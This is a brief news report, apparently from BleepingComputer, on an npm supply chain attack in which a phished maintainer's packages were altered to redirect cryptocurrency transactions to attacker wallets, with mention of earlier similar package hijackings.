Hackers hijack npm packages with 2 billion weekly downloads in supply chain attack www.bleepingcomputer.com/news/secu…

In what is being called the largest supply chain attack in history, attackers have injected malware into NPM packages with over 2.6 billion weekly downloads after compromising a maintainer’s account in a phishing attack.

The malicious code only impacts individuals accessing the compromised applications over the web, monitoring for cryptocurrency addresses and transactions that are then redirected to attacker-controlled wallet addresses. The malware operates by injecting itself into the web browser, monitoring Ethereum, Bitcoin, Solana, Tron, Litecoin, and Bitcoin Cash wallet addresses or transfers. On network responses with crypto transactions, it replaces the destinations with attacker-controlled addresses and hijacks transactions before they’re signed.

This supply-chain attack follows a series of similar attacks targeting developers of various well-known JavaScript libraries over the past few months. For instance, in July, attackers compromised eslint-config-prettier, a package with over 30 million weekly downloads, while in March, ten other widely used npm libraries were hijacked and turned into info-stealers.